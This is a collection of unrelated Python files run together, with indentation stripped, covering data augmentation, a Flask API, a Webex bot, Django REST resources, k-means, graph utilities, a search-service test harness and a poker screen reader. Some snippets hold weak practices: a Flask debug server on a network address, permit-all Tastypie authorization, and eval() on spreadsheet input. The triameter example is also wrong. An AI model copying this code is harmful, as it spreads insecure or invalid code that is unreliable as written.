newqueryCollect.append(query.replace('most', 'highest'))
newlogicCollect.append(logic)
newschemaCollect.append(schema)
if np.random.rand() >= 0.5:
# minimum
newqueryCollect.append(query.replace('most', 'minimum'))
newlogicCollect.append(logic.replace('max ', 'min '))
newschemaCollect.append(schema)
else:
# smallest
newqueryCollect.append(query.replace('most', 'least'))
newlogicCollect.append(logic.replace('max ', 'min '))
newschemaCollect.append(schema)
if query.find('latest') != -1:
newqueryCollect.append(query.replace('latest', 'earliest'))
newlogicCollect.append(logic.replace('max ', 'min '))
newschemaCollect.append(schema)
if query.find('longest') != -1:
newqueryCollect.append(query.replace('longest', 'shortest'))
newlogicCollect.append(logic.replace('max ', 'min '))
newschemaCollect.append(schema)
continue
# non-equal to equal
if logic.find('neq')!= -1 and query.find(' not ') != -1:
# neq
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
# equal
newqueryCollect.append(query.replace(' not ', ' '))
newlogicCollect.append(logic.replace('neq', 'equal'))
newschemaCollect.append(schema)
continue
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
return newqueryCollect, newlogicCollect, newschemaCollect
def TD_Augmenting(TD, configdict):
'''Provided certain information of TD, we can generate a test dataset
'''
parser = stanford.StanfordParser(model_path='/Users/richard_xiong/Documents/DeepLearningMaster/deep_parser/englishPCFG.ser.gz')
queryCollect, logicCollect, schemaCollect = [], [], []
for lo in TD['examples']:
collect = TD['examples'][lo]
queryTiny, logicTiny, schemaTiny = main(parser, TD['schema'], configdict, \
collect, lo, TD['schema'].keys())
queryExpa, logicExpa, schemaExpa = expandDatasets(queryTiny, logicTiny, schemaTiny)
queryCollect.extend(queryExpa)
logicCollect.extend(logicExpa)
schemaCollect.extend(schemaExpa)
return queryCollect, logicCollect, schemaCollect |
__author__ = "Sean D'Rosario"
"""
Submission for HW 10 for DS-GA-1007
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import Assignment10 as a10
class Assignment10mainclass:
if __name__ == '__main__':
a10.read_data()
a10.main()
|
#!flask/bin/python
from flask import Flask, jsonify
from flask import request
from flask import abort
from flask import make_response
import false_packer
import json
app = Flask(__name__)
@app.route('/packer_faker/api/v1.0/pack_asin', methods=['OPTIONS'])
def option_interceptor():
response = make_response()
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers['Access-Control-Allow-Methods'] = 'POST, GET, OPTIONS'
response.headers['Access-Control-Allow-Headers'] = 'origin, x-csrftoken, content-type, accept'
return response, 201
@app.route('/packer_faker/api/v1.0/pack_asin', methods=['POST'])
def pack_asin():
if not request.json:
abort(400)
result = false_packer.pack_fake(json.dumps(request.json))
response = make_response(jsonify(result))
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers['Access-Control-Allow-Methods'] = 'POST, GET, OPTIONS'
response.headers['Access-Control-Allow-Headers'] = 'origin, x-csrftoken, content-type, accept'
return response, 201
if __name__ == '__main__':
app.run(debug=True, host="10.48.129.192", port = 5001)
|
# In this notebook we use symbolic calculation to find all critical points of a function and the eigenvalues associated. This way we can know the shape of the maxima / minima
import sympy as sy
import plotly.graph_objs as go
x,y = sy.symbols('x y')
sy.init_printing(use_unicode=True)
#%% Define Function
f = x**4+y**2-x*y # function 2 from Stanford
#f = 4*x + 2*y - x**2 -3*y**2
f
df_dy = sy.diff(f,y)
df_dx = sy.diff(f,x)
df_dx
#%% Find critical points
cr =sy.nonlinsolve([df_dx,df_dy],[x,y])
print('critical points',cr)
cr
#%% build hessian
e = sy.hessian(f,[x,y])
e
#%% Find eigenvalues for each of the critical points
for c in cr :
xv = c[0]
yv = c[1]
print('Critical point : \n\tx : {} \n\ty : {}'.format(xv.evalf(),yv.evalf()))
eigs = list(e.subs({x:xv,y:yv}).eigenvals().keys())
if eigs[0] > 0 and eigs[1] > 0 :
print('Concave up')
elif eigs[0] < 0 and eigs[1] < 0 :
print('Concave down')
else :
print('Saddle Point')
print('Eigen Values : ',eigs)
|
import re
def phoneNumberValidator(number):
pattern = '^[6-9][0-9]{9}$|^[0][6-9][0-9]{9}$|^[+][9][1][6-9][0-9]{9}$'
if re.match(pattern, str(number)):
#print("valid number")
return True
else:
#print("Not valid number")
return False
def emailValidator(email):
pattern = '^[0-9a-z][0-9a-z_.]{4,18}@[0-9a-z]{3,8}.[a-z]{2,4}$'
if re.match(pattern, str(email)):
#print("valid number")
return True
else:
#print("Not valid number")
return False |
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 7 16:50:16 2019
@author: HP
"""
class Node:
def __init__(self,data):
self.key=data
self.next=None
class LinkedList:
def __init__(self):
self.head=None
self.tail=None
def push(self,data):
new_node=Node(data)
new_node.next=self.head
self.head=new_node
if self.tail==None:
self.tail=self.head
def pop(self):
if self.head!=None:
self.head=self.head.next
def prnt(self,node):
while node!=None:
print(node.key)
node=node.next
list=LinkedList()
list.push(5)
list.push(10)
list.push(9)
list.push(13)
list.pop()
list.prnt(list.head)
print(list.head.key,list.tail.key) |
import healpy as hp
import healsparse as hsp
import numpy as np
from scipy.spatial import cKDTree
import astropy.io.fits as pyfits
from astropy.coordinates import SkyCoord
from astropy.cosmology import FlatwCDM
cosmo = FlatwCDM(H0=70, Om0=0.3)
def footprint_check(mask_file, ra, dec):
masks=pyfits.open(mask_file)[1].data
nside = 4096
theta = (90.0 - dec)*np.pi/180.
phi = ra*np.pi/180.
pix_acts=hp.ang2pix(nside, theta, phi)
pixels_acts= np.array([pix_acts, np.ones(len(pix_acts))]).transpose()
masks=masks[ np.where( (masks['HPIX'] >= np.min(pix_acts)) & (masks['HPIX'] <= np.max(pix_acts)) )]
pixels= np.array([masks['HPIX'], masks['FRACGOOD']]).transpose()
tree=cKDTree(pixels_acts)
dis, inds = tree.query(pixels , k=1, p=1)
ind_keep=inds[np.where(dis < 0.05)]
return ind_keep
def footprint_check_python(mask_file, ra, dec):
masks=hsp.HealSparseMap.read(mask_file)
values = masks.get_values_pos(ra, dec, lonlat=True)
ind_keep= np.where(values['fracgood'] > 0.95)
return ind_keep
def footprint_check_python_zmax(mask_file, ra, dec, zs):
masks=hsp.HealSparseMap.read(mask_file)
values = masks.get_values_pos(ra, dec, lonlat=True)
ind_keep= np.where( (values['fracgood'] > 0.95) & (values['zmax'] > zs))
return ind_keep
def match_ACT_to_redmapper(act_ra, act_dec, clusters_ra, clusters_dec, dAs, z1, z2):
acts_coords=SkyCoord(act_ra, act_dec, frame='icrs', unit='deg')
rdmp_coords=SkyCoord(clusters_ra, clusters_dec, frame='icrs', unit='deg')
ind_acts = np.zeros(len(act_ra), dtype=np.int64)
ind_rdmp = np.zeros(len(act_ra), dtype=np.int64)
dis_acts_rp = np.zeros(len(act_ra))
for ii in range(len(act_ra)):
sep=rdmp_coords.separation(acts_coords[ii]).arcminute
comp_dis = sep/60.0/180.0*np.pi #* dAs
#comp_dis=cosmo.kpc_proper_per_arcmin(dAs).value * sep/1000.0
ind_temp, =np.where(comp_dis*dAs < 1.)
if (len(ind_temp)) > 1:
print('More than one redmapper matches for RA %f DEC %f'%(act_ra[ii], act_dec[ii]))
dis_acts_rp_ind = np.argmin(comp_dis)
ind_rdmp[ii]=dis_acts_rp_ind
ind_acts[ii]=ii
dis_acts_rp[ii] = comp_dis[dis_acts_rp_ind] * dAs[dis_acts_rp_ind]
ind_keep, =np.where(dis_acts_rp < 1.5)
return ind_keep, ind_rdmp[ind_keep], dis_acts_rp[ind_keep]
def est_centerfrac(dist):
ind, =np.where(dist <0.05)
return np.float(len(ind))/np.float(len(dist))
|
"""
TECHX API GATEWAY
COMMUNICATION WITH WEBEX TEAMS
CREATED BY: FRBELLO AT CISCO DOT COM
DATE : JUL 2020
VERSION: 1.0
STATE: RC2
"""
__author__ = "Freddy Bello"
__author_email__ = "frbello@cisco.com"
__copyright__ = "Copyright (c) 2016-2020 Cisco and/or its affiliates."
__license__ = "MIT"
# ==== Libraries ====
import os
import logging
import yaml
from webexteamssdk import WebexTeamsAPI, WebhookEvent, ApiError
# ==== Custom APIGW Libraries ====
from apigw.apigw_dispatcher import APIGWDispatcher
from apigw.apigw_generic import webex_teams_enable
from apigw.apigw_misc import CovidStats
from apigw.apigw_card import meraki_form, simple_form
from apigw.apigw_meraki import APIGWMerakiWorker, meraki_api_enable
# ==== Create a Logger ======
logger = logging.getLogger("apigw.WebexTeams")
def apigw_webex_listener(payload):
"""
Receive Webhook Callback from Webex Teams
payload is in JSON
"""
logger.info("Incoming Message from Webex Teams")
# Validate if Callback is from a valid Webex Team Space
#### BEST PRACTICE FOR Allow Only Traffic of Interest
source_room = payload["data"]["roomId"]
if not check_source_room(source_room):
response = {"status_code": 400, "status_info": "No a Valid Room"}
return response
#Retrieve the person Email for Requestor Validation
#### BEST PRACTICE FOR Allow Only Traffic of Interest
requestor_email = payload["data"]["personEmail"]
if not check_requestor_email(requestor_email):
logger.info("Person is not allowed: %s ", requestor_email)
response = {"status_code": 400, "status_info": "User is not in Allowance List"}
return response
logger.info("Person is in allowance list: %s ", requestor_email)
# If Room is a valid source, then Instatiate the APIG Create all the Objects
webex_bot = WebexTeamsAPI()
webex_rx = WebhookEvent(payload)
dispatcher = APIGWDispatcher(webex_bot)
# Webex Teams API Objects
in_room = webex_bot.rooms.get(webex_rx.data.roomId)
in_msg = webex_bot.messages.get(webex_rx.data.id)
in_person = webex_bot.people.get(in_msg.personId)
requestor_name = in_person.displayName
requestor_orgid = in_person.orgId
my_own = webex_bot.people.me()
out_msg = ""
# Verify is message arrive from a valid Organization
#### BEST PRACTICE FOR Allow Only Traffic of Interest
if check_orgid_origin(requestor_orgid):
logger.info("Organization is allowed")
else:
logger.info("Organization is not allowed")
response = {"status_code": 400, "status_info": "Organization is not Allowed"}
return response
# Built the Actions Menu in the APIGWDispatcher
logger.info("Preparing Actions Menu for APIGWDispatcher for Webex Teams Client for %s", requestor_name)
if apigw_actions_builder(dispatcher, requestor_name):
logger.info("Webex Teams Action Menu built sucessfully")
else:
logger.error(
"Action Menu build fails, Default Action is the only opyion available"
)
# Start Processing
response = {"status_code": 200, "status_info": "success"}
if in_room.type == "direct":
order_intent = in_msg.text.rstrip()
else:
input_str = in_msg.text.split(" ", 1)
order_intent = input_str[1]
try:
if in_msg.personId == my_own.id:
response = {"status_code": 400, "status_info": "Can't message myself"}
return response
out_msg = dispatcher.get_orders(order_intent, in_person, in_room)
response = {
"status_code": 200,
"status_info": "success",
"request": order_intent,
"space": in_room.title,
}
logger.info(response)
except ApiError as err:
logger.error("Failure in procesing incoming message from Team : %s", err)
out_msg = "**Unable to process the Message**"
response = {"status_code": 400, "status_info": "error"}
if apigw_send_message(webex_bot, in_room.id, out_msg):
logger.info("Messsage Dispatched : %s", out_msg)
else:
logger.info("Messsage Delivery Failure")
# Clean Objects
del webex_bot
del dispatcher
del webex_rx
logger.info("All Objects references has been cleared out")
return response
# ====== Helpers Functions ==========
## ========= SECURITY CHECK FUNCTIONS ============
def check_source_room(room_id):
"""
Helper Function to validate if Space is One:One or Group
Return True/False
"""
direct_room = str(os.environ["WEBEX_TEAMS_DIRECT_ROOM"])
group_room = str(os.environ["WEBEX_TEAMS_GROUP_ROOM"])
check = False
if room_id in (direct_room, group_room):
check = True
return check
def check_orgid_origin(msg_orgid):
"""
Check ORGID from the Job Requester from Webex
receive REQ_ORGID
return: True/False
WEBEX BEST PRACTICE
/blog/building-a-more-secure-bot
"""
comm_allowed = False
bot_orgid = str(os.environ['WEBEX_ALLOWED_ORGANIZATION'])
if bot_orgid == msg_orgid:
comm_allowed = True
return comm_allowed
def check_requestor_email(person_email):
"""
Check personEmail from the Job Requester from Webex
receive personEmail from webhook message
return: True/False
WEBEX BEST PRACTICE
/blog/building-a-more-secure-bot
"""
comm_allowed = False
with open('allowed_users.yaml', 'r') as stream:
data = yaml.safe_load(stream)
if person_email in str(data["Allowed"]["email"]):
comm_allowed = True
return comm_allowed
### =================== END OF SECURITY ===============
## ====== General Purpuose Functions ========
def get_health(message):
"""
Simple Health Check
params
message: incoming message
return: True/False
"""
if message:
health_check = "Webex Teams Comm is Working :) "
else:
health_check = " Webex Teams Comm is not working :("
return health_check
def apigw_send_message(webex_bot, room_id, message, card=None):
"""
DRY for Message delivery
"""
delivery_status = False
try:
if card is None:
webex_bot.messages.create(room_id, markdown=message)
else:
webex_bot.messages.create(room_id, text=message, atachments=card)
delivery_status = True
except ApiError:
delivery_status = False
return delivery_status
def send_card(message):
"""
Send an AdaptiveCard
"""
return meraki_form
def simple_card(message):
"""
Send an AdaptiveCard
"""
return simple_form
# Generic Action Registrar
def apigw_actions_builder(dispatcher, requestor_name):
"""
Create the Menu Actions based on Enabled Services
params:
Registrar - APIGWDispatcher Object
Requester - Person sending the message
ActionSet - The Action Array (action-word, halper-msg, command)
return: True/False
"""
action_builder = False
if webex_teams_enable():
dispatcher.add_action(
"webex-health", "Get Health of Webex Teams Link", get_health
)
dispatcher.add_action("send-card", "Send Meraki Form", send_card)
dispatcher.add_action("simple-card", "Adaptive Card Simple form", simple_card)
action_builder = True
# Meraki Service
if meraki_api_enable():
mki = APIGWMerakiWorker(requestor_name)
dispatcher.add_action(
"show-network",
"Summary Info of Managed Meraki Network",
mki.show_meraki_network
)
dispatcher.add_action(
"show-vlans",
"Display a List with the VLANS attached to the Meraki Network",
mki.show_meraki_vlans
)
dispatcher.add_action(
"show-switch",
"Display a List with the Switches attached to the Meraki Network",
mki.show_meraki_switch
)
dispatcher.add_action(
"change-port",
"Parameters: Switch IP, Switch-Port, Vlan-ID ie _change-port 1.1.1.1 10 101_",
mki.change_port_vlan
)
dispatcher.add_action(
"activate-ssid",
"Parameters: SSID Name, ie _activate-ssid SSIDName_",
mki.activate_new_ssid
)
dispatcher.add_action(
"show-ssid",
"Parameters: Display a List of All Enabled SSIDs",
mki.show_meraki_ssid
)
dispatcher.add_action(
"remove-ssid",
"Parameters: Remove and Disable a SSIDs by name or Number ID ie _remove-ssid <SSID NAME> | <SSID NUMBER 1 to 15>_",
mki.remove_ssid
)
dispatcher.add_action(
"show-ports",
"Parameters: Display All Ports in a Switch _show-ports <Switch IP>_",
mki.show_meraki_ports
)
dispatcher.add_action(
"show-mx-ports",
"Parameters: Display All Ports in a MX appliance _show-mx-ports_",
mki.show_meraki_mx_ports
)
dispatcher.add_action(
"disable-port",
"Parameters: Deactivate Switch Port _diasble-port <IP_ADDR> <PORT_ID>_",
mki.deactivate_port
)
# Sample Service
covid = CovidStats()
dispatcher.add_action(
"covid-info", "Latest-Covid Information", covid.get_covid_summary
)
return action_builder |
from rest_framework import serializers
from ebooks.models import Ebook, Review
class ReviewSerializer(serializers.ModelSerializer):
review_author = serializers.StringRelatedField(read_only=True)
class Meta:
model = Review
exclude = ("ebook",)
# fields = "__all__"
class EbookSerializer(serializers.ModelSerializer):
reviews = ReviewSerializer(many=True, read_only=True)
class Meta:
model = Ebook
fields = "__all__" |
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# @Time : 2021/4/8 19:07
# @Author :'liuyu'
# @Version:V 0.1
# @File :
# @desc :
import pandas as pd
from pandas import read_parquet
def verify_product(path):
data = read_parquet(path)
print(data.count())
data.head()
def verify_user(path):
data = read_parquet(path)
print(data.count())
if __name__ == '__main__':
path1 = "../chapter10/myCollaborativeFilter/data/product"
verify_product(path1) |
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from skimage import io
pic = io.imread("./data/bird_small.png") / 255.
io.imshow(pic)
print(pic.shape)
data = pic.reshape(128 * 128, 3)
def k_means(data, k, epoch=100, n_init=10):
"""do multiple random init and pick the best one to return
Args:
data (pd.DataFrame)
Returns:
(C, centroids, least_cost)
"""
tries = np.array([_k_means_iter(data, k, epoch) for _ in range(n_init)])
least_cost_idx = np.argmin(tries[:, -1])
return tries[least_cost_idx]
def combine_data_C(data, C):
data_with_c = data.copy()
data_with_c['C'] = C
return data_with_c
def random_init(data, k):
"""choose k sample from data set as init centroids
Args:
data: DataFrame
k: int
Returns:
k samples: ndarray
"""
return data.sample(k).values
def _find_your_cluster(x, centroids):
"""find the right cluster for x with respect to shortest distance
Args:
x: ndarray (n, ) -> n features
centroids: ndarray (k, n)
Returns:
k: int
"""
distances = np.apply_along_axis(func1d=np.linalg.norm, # this give you l2 norm
axis=1,
arr=centroids - x) # use ndarray's broadcast
return np.argmin(distances)
def assign_cluster(data, centroids):
"""assign cluster for each node in data
return C ndarray
"""
return np.apply_along_axis(lambda x: _find_your_cluster(x, centroids),
axis=1,
arr=data.values)
def new_centroids(data, C):
data_with_c = combine_data_C(data, C)
return data_with_c.groupby('C', as_index=False).mean().sort_values(by='C').drop('C', axis=1).values
def cost(data, centroids, C):
m = data.shape[0]
expand_C_with_centroids = centroids[C]
distances = np.apply_along_axis(func1d=np.linalg.norm,
axis=1,
arr=data.values - expand_C_with_centroids)
return distances.sum() / m
def _k_means_iter(data, k, epoch=100, tol=0.0001):
"""one shot k-means
with early break
"""
centroids = random_init(data, k)
cost_progress = []
for i in range(epoch):
print('running epoch {}'.format(i))
C = assign_cluster(data, centroids)
centroids = new_centroids(data, C)
cost_progress.append(cost(data, centroids, C))
if len(cost_progress) > 1: # early break
if (np.abs(cost_progress[-1] - cost_progress[-2])) / cost_progress[-1] < tol:
break
return C, centroids, cost_progress[-1]
C, centroids, cost = k_means(pd.DataFrame(data), 16, epoch=10, n_init=3)
compressed_pic = centroids[C].reshape((128, 128, 3))
fig, ax = plt.subplots(1, 2)
ax[0].imshow(pic)
ax[1].imshow(compressed_pic)
plt.show()
from sklearn.cluster import KMeans
model = KMeans(n_clusters=16, n_init=100, n_jobs=-1)
model.fit(data)
centroids = model.cluster_centers_
print(centroids.shape)
C = model.predict(data)
print(C.shape)
print(centroids[C].shape)
compressed_pic = centroids[C].reshape((128, 128, 3))
fig, ax = plt.subplots(1, 2)
ax[0].imshow(pic)
ax[1].imshow(compressed_pic)
plt.show()
|
N = 6
L = 1
NUM_SWITCHES = 49
|
#!/usr/bin/python
from Tkinter import *
w = Tk()
text = Text(w)
scrollbar = Scale(w, from_=0, to=5)
# Code to add widgets
text.insert(INSERT, "git gud skrub")
text.pack()
scrollbar.pack()
w.mainloop() #Main Window
|
# -*- coding: utf-8 -*-
# Copyright (C) 2018 by
# David Amos <somacdivad@gmail.com>
# Randy Davila <davilar@uhd.edu>
# BSD license.
#
# Authors: David Amos <somacdivad@gmail.com>
# Randy Davila <davilar@uhd.edu>
"""Function for computing the triameter of a graph.
"""
from itertools import combinations
import grinpy as gp
__all__=['triameter']
def triameter(G):
"""Returns the triameter of the graph G with at least 3 nodes.
The *triameter* of a graph G with vertex set *V* is defined as the
following maximum value
.. math::
\max\{d(v,w) + d(w,z) + d(v,z): v,w,z \in V: \}
----------
G : NetworkX graph
An undirected graph with order at least 3.
-------
Int:
The triameter of the graph G.
Examples
--------
>>> G = nx.cycle_graph(5)
>>> nx.triameter(G)
True
References
----------
A. Das, The triameter of graphs, ArXiv preprint arXiv:1804.01088, 2018.
https://arxiv.org/pdf/1804.01088.pdf
"""
d = []
for s in combinations(G.nodes(), 3):
s = list(s)
x1 = len(gp.shortest_path(G,source=s[0],target=s[1]))
x2 = len(gp.shortest_path(G,source=s[1],target=s[2]))
x3 = len(gp.shortest_path(G,source=s[0],target=s[2]))
d.append(x1+x2+x3)
return max(d)
|
# Given a square matrix mat, return the sum of the matrix diagonals.
#
# Only include the sum of all the elements on the primary diagonal
# and all the elements on the secondary diagonal
# that are not part of the primary diagonal.
class Solution:
def diagonalSum(self, mat):
from numpy import array, identity
mat = array(mat)
res = int(sum(sum(mat * identity(len(mat)))) +
sum(sum(mat * identity(len(mat))[::-1])))
if len(mat) % 2 == 1:
return res - mat[len(mat) // 2, len(mat) // 2]
else:
return res
if __name__ == '__main__':
test_input = [[1, 2, 3],
[4, 5, 6],
[7, 8, 9]]
print(Solution.diagonalSum(Solution, test_input))
|
def drawpoly(myturtle,sides,length):
angle=360/sides
dside=0
while sides!=dside:
myturtle.right(angle)
myturtle.forward(length)
dside+=1
from turtle import *
n=int(input("number of sides>>"))
s=int(input("length of sides>>"))
t=Turtle()
drawpoly(t,n,s)
|
#coding=utf-8
import json
import sys # 导入sys模块,用于引入thrift生成的文件
import xlrd
reload(sys)
sys.setdefaultencoding('utf8')
#print os.path.abspath('..\\searchClient')
sys.path.append("../searchClient")
#sys.path.append(r'''E:\AutoTestInterface\search-service''')
from lib.Client import Client
#from searchClient.lib.Client import Client
from xlwt import Style
from xlutils.copy import copy
sys.path.append('../gen-py')
class NewestLibrary(object):
def __init__(self):
self._result=''
def get_dataTable(self,sheetName):
data = xlrd.open_workbook(r'../testcases/case.xls') # 读取excel
table = data.sheet_by_name(sheetName) # 通过索引顺序获取 0:sheet1
self.caseName = table.col_values(0, 1)
self.testData = table.col_values(1, 1)
self.exceptResult = table.col_values(2, 1)
self.sheetName=sheetName
def get_TestData(self,dataType):
if dataType=='caseName':
return self.caseName
elif dataType=='testData':
return self.testData
elif dataType=='exceptResult':
return self.exceptResult
else:
raise AssertionError('There is no %s ' % (dataType))
def excu_search_v4(self,params):
print(params)
print(type(params))
self.caseParam = params
client = Client('172.20.17.67', 9090).setClass('Search').setMethod('getSearchData_v4').getApi() # 连接服务器
params = params.encode('utf-8')
result = client.getSearchData_v4(params)# 调用接口
self._result=result
#print("res:%s",(self._result))
def excu_search_v3(self,params):
print(params)
self.caseParam = params
client = Client('172.20.17.67', 9090).setClass('Search').setMethod('getSearchStore_v3').getApi() # 连接服务器
params = params.encode('utf-8')
result = client.getSearchData_v4(params)# 调用接口
print(result)
self._result=result
def _resultToPython(self):
#self._setSearchWord(self.caseParam)
json_to_python = json.loads(self._result)
result = json_to_python[self.searchWord]
return result
# 检查rows里面每个商品详情
def result_check(self,excepted,sheetName):
self._setSearchWord()
result = self._resultToPython()
# 返回为空
print "result type:%s" %(type(result))
print "excepted type:%s,excepted:%s" %(type(excepted),excepted)
if result == False:
if excepted == 0:
print("22222222222")
pass
else:
print("3333333333")
raise AssertionError("except is not same as result!!%s%s" %(type(excepted),excepted))
else:
if excepted == 1:
print("1111")
pass
else:
# 有商品返回
for i in range(0,len(result.values()[2].get('rows'))):
print("row_size:%d") %(len(result.values()[2].get('rows')))
itemResult = result.values()[2].get('rows')[i]
itemRes = self.result_should_be(excepted, itemResult, sheetName)
if itemRes == False:
print "1111111111111111111111111111111111111111111111111111"
raise AssertionError("result[%d] cannot pass the case" %(i))
# 预期与实际结果对比
def result_should_be(self, excepted, itemResult, sheetName):
defaultRes = False
exitResult = 0
# 第二版复杂数据:assert数据:{"1":{"a":"AA"},"2":{"b":"BB","c":"CC"}},1和2是or关系
if sheetName.strip().startswith('extend_v4'):
excepteds = eval(excepted.encode("utf-8"))
keylist = excepteds.keys()
print('aaaaaa:')
keylist.sort()
for i in keylist:
exp = str(excepteds[i]).replace('\'','\"')
print(exp)
resultNum = self._comparaResult(exp,itemResult)
exitResult += resultNum
else:
#第一版简单数据:assert数据:{"a":"AA","b":"BB|CC"} ,a和b是and关系
print('bbbbbbbb:')
exitResult = self._comparaResult(excepted, itemResult)
if exitResult >0:
defaultRes = True
return defaultRes
def _comparaResult(self,expected,result):
if expected == False:
return 0
else:
print('999999--')
expectDict = json.loads(expected)
print expectDict
print type(expectDict)
expectKeys = list(expectDict.keys()) # 获取预期结果的keys
expectValues = expectDict.values() # 获取预期结果的values
for i in range(0, len(expectKeys)):
print 'len:%d' %(len(expectKeys))
expectKey = expectKeys[i]
if result.has_key(expectKey):
realValue = result.get(expectKey)
else:
continue
judge = False
#兼容doc中有list值得数据
if(isinstance(realValue,list)):
print('111111')
for j in range(0,len(realValue)):
print "realvalue:%s" %(realValue[j])
judgeItem = self._isinlist(realValue[j],expectValues[i].split('|'))
if judgeItem == True:
judge = True
break
else:
pass
else:
if(expectValues[i].find('-')== -1):
print ("hellloooo")
judge = self._isinlist(realValue, expectValues[i].split('|'))
else:
print ("world~~~,%s,%s" % (expectValues[i][1:],realValue))
judge = self._exceptlist(realValue,expectValues[i])
print(judge)
if judge == False:
return 0
return 1
def _isinlist(self,realValue, lists):
lens = len(lists)
#print 'real:%d' %(realValue)
#print 'type:%s,expect:%s' %(lists[0],type(lists[0]))
#print 'listlen:%d' %(lens)
returnres = False
for i in range(0,lens):
if realValue == lists[i]:
return True
elif isinstance(realValue,int):
if realValue == int(lists[i]):
return True
else:
returnres = False
else:
returnres = False
return returnres
def _exceptlist(self,realValue,strs):
if realValue != strs:
print ("asssssss")
return True
else:
print ("zzzzz")
return False
def _setSearchWord(self):
params = self.caseParam
#.encode('utf-8') # unicode转str
# 关键词提取
res = json.loads(self._result)
if json.loads(params).has_key("search"):
if res.has_key("correct_keyword"):
search_word = res["correct_keyword"]
else:
search_word = json.loads(params)["search"]
else:
search_word = ''
self.searchWord = search_word
def _setExceptedResult(self,index):
self.excepted=self.exceptResult[index]
def page_check(self,excepted):
self._setSearchWord()
result = self._resultToPython()
exceptedKeys = json.loads(excepted).keys()
exceptedValues = json.loads(excepted).values()
for i in range(0,len(exceptedKeys)):
print(result["data"].get(exceptedKeys[i]))
realValue = result["data"].get(exceptedKeys[i])
exceptedValue_int = int(exceptedValues[i].encode())
if realValue != exceptedValue_int:
print("1111")
raise AssertionError("not pass the case!")
if __name__ == '__main__':
test=NewestLibrary()
#test.get_dataTable('basic_v4')
#test.get_dataTable()
test.excu_search_v4('{"search_type":0,"rows_per_page":100,"pre":1}')
test.result_check('TRUE','basic_v4')
'''
test.excu_search_v4('{"search_type":0,"category_id":[508,507,509]}')
test.result_check('{"{"category_id_4":"509"}','basic_v4')
'''
#test.excu_search_v4('{"search_type":0,"category_id":[508,507,509]}')
#test.excu_search_v4('{"search_type": 0,"search":"ysld","proposeAutoCorrect":0}')
#test.result_check('FALSE','basic_v4')
#test.excu_search_v4('{"rows_per_page": 100,"search":"口红 "}')
#test.page_check('{"pageNumber":"1"}') |
from tastypie.resources import ModelResource
from tastypie.authentication import Authentication
from tastypie.authorization import Authorization
import models
class TestResource(ModelResource):
class Meta:
queryset = models.Test.objects.all()
authorization = Authorization()
authentication = Authentication() |
# import the necessary packages
import os
import logging
from configuration import Config as cfg
from card_util import get_game_area_as_2d_array, rgb_yx_array_to_grayscale, \
find_contours, diff_polygons, display_image_with_contours, timeit
import numpy as np
logger = logging.getLogger(__name__)
trace_logger = logging.getLogger(__name__ + "_trace")
class NumberReader(object):
def __init__(self):
self.training_data = []
self.train_numbers(file_path=os.path.join(cfg.NUMBER_DATA_PATH, 'numbers_1_to_6.png'),
hero_numbers=[1, 2, 3, 4, 5, 6, -1])
self.train_numbers(file_path=os.path.join(cfg.NUMBER_DATA_PATH, 'numbers_6_to_0.png'),
hero_numbers=[6, 7, 8, 9, 0, -1])
def train_numbers(self, file_path, hero_numbers):
image_array = get_game_area_as_2d_array(file_path)
# display_image_with_contours(image_array, [])
hero_bet_array = cfg.HERO_BETTING_AREA.clip_2d_array(image_array)
hero_bet_grey_array = rgb_yx_array_to_grayscale(hero_bet_array)
hero_bet_grey_array[hero_bet_grey_array >= 121] = 255
contour_list = find_contours(grey_array=hero_bet_grey_array,
**cfg.OTHER_PLAYER_BET_CONTOUR_CONFIG
)
sorted_contours = sorted(contour_list, key=lambda x: x.bounding_box.min_x)
# display_image_with_contours(hero_bet_grey_array, [c.points_array for c in sorted_contours])
self.training_data.extend(zip(hero_numbers, sorted_contours))
def _digit_contours_to_integer(self, digit_contours):
digit_contours = sorted(digit_contours, key=lambda x: x.bounding_box.min_x)
numbers_found = []
for digit_index, digit_contour in enumerate(digit_contours):
if digit_index > 0 and digit_contours[digit_index - 1].polygon.contains(digit_contour.polygon):
# Catch inner circle of 0s
continue
card_diffs = [diff_polygons(digit_contour, t[1]) for t in self.training_data]
idx = np.argmin(card_diffs, axis=0)
numbers_found.append(self.training_data[idx][0])
logger.debug(f"Numbers found: {numbers_found}")
# Last number will be the $
numbers_found = numbers_found[0:-1]
this_bet_value = None
if numbers_found:
this_bet_value = int("".join([str(n) for n in numbers_found if n >= 0]))
return this_bet_value
def get_starting_pot(self, game_area_image_array):
pot_image_array = cfg.STARTING_POT_AREA.clip_2d_array(game_area_image_array)
pot_image_grey_array = rgb_yx_array_to_grayscale(pot_image_array)
digit_contours = find_contours(grey_array=pot_image_grey_array,
**cfg.POT_CONTOUR_CONFIG,
display=False
)
digit_contours = list(digit_contours)
# display_image_with_contours(pot_image_grey_array, [c.points_array for c in digit_contours])
starting_pot_value = self._digit_contours_to_integer(digit_contours)
# display_image_with_contours(pot_image_grey_array, [digit_contours[2].points_array] +
#
# [x[1].points_array for x in self.training_data if x[0] in [9,0]])
if starting_pot_value is None:
starting_pot_value = 0
return starting_pot_value
@timeit
def get_hero_chips_remaining(self, game_area_image_array):
chips_image_array = cfg.HERO_REMAINING_CHIPS_AREA.clip_2d_array(game_area_image_array)
#display_image_with_contours(chips_image_array, contours=[])
chips_image_grey_array = rgb_yx_array_to_grayscale(chips_image_array)
digit_group_contours = find_contours(grey_array=chips_image_grey_array,
**cfg.CHIPS_REMAINING_DIGIT_GROUPS_CONTOUR_CONFIG,
display=False
)
digit_group_contours = list(digit_group_contours)
if False:
display_image_with_contours(chips_image_grey_array,
[c.points_array for c in digit_group_contours])
chips_image_grey_array = self.add_spaces_to_digits(
image_grey_array=chips_image_grey_array,
digit_group_contours=digit_group_contours
)
digit_contours = find_contours(grey_array=chips_image_grey_array,
**cfg.CHIPS_REMAINING_DIGIT_CONTOUR_CONFIG,
display=False
)
digit_contours = list(digit_contours)
chips_remaining = self._digit_contours_to_integer(digit_contours)
logger.info(f"Chips remaining: {chips_remaining}")
if False:
display_image_with_contours(chips_image_grey_array,
[c.points_array for c in digit_contours])
return chips_remaining
